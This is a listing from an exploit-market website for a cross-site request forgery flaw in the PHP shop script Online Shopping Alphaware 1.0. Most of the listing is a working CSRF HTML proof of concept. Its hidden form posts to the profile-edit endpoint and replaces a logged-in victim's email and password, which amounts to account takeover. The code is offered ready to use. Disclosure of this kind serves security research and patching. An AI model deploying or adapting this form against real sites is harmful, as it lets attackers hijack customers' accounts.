[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Online Shopping Alphaware 1.0 Cross Site Request Forgery Vulnerability

Author
Edo Maland
Risk
[
Security Risk Low
]
0day-ID
0day-ID-34800
Category
web applications
Date add
06-08-2020
Platform
php
# Exploit Title: Online Shopping Alphaware 1.0  - Cross-Site Request Forgery (Account Takeover)
# Exploit Author: Edo Maland
# Vendor Homepage: https://www.sourcecodester.com/php/14368/online-shopping-alphaware-phpmysql.html
# Software Link: https://www.sourcecodester.com/download-code?nid=14368&title=Online+Shopping+Alphaware+in+PHP%2FMysql
# Version: 1.0
# Tested On Windows & Linux Server

# Vulnerability Details
# Description :  Account Take over and Edit Profil Customer

# POC

The email and password parameters can be forged to force the password change of another user account.

# CSRF HTML

<html>
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="http://example.com/alphaware/function/edit_customer.php" method="POST">
      <input type="hidden" name="firstname" value="info" />
      <input type="hidden" name="mi" value="x" />
      <input type="hidden" name="lastname" value="csrf" />
      <input type="hidden" name="address" value="Yogyakarta" />
      <input type="hidden" name="country" value="Indonesia" />
      <input type="hidden" name="zipcode" value="1337" />
      <input type="hidden" name="mobile" value="1337" />
      <input type="hidden" name="telephone" value="1337" />
      <input type="hidden" name="email" value="info@csrf.id" />
      <input type="hidden" name="password" value="changepasswordhere" />
      <input type="hidden" name="edit" value="Save Changes" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

#  0day.today [2024-11-16]  #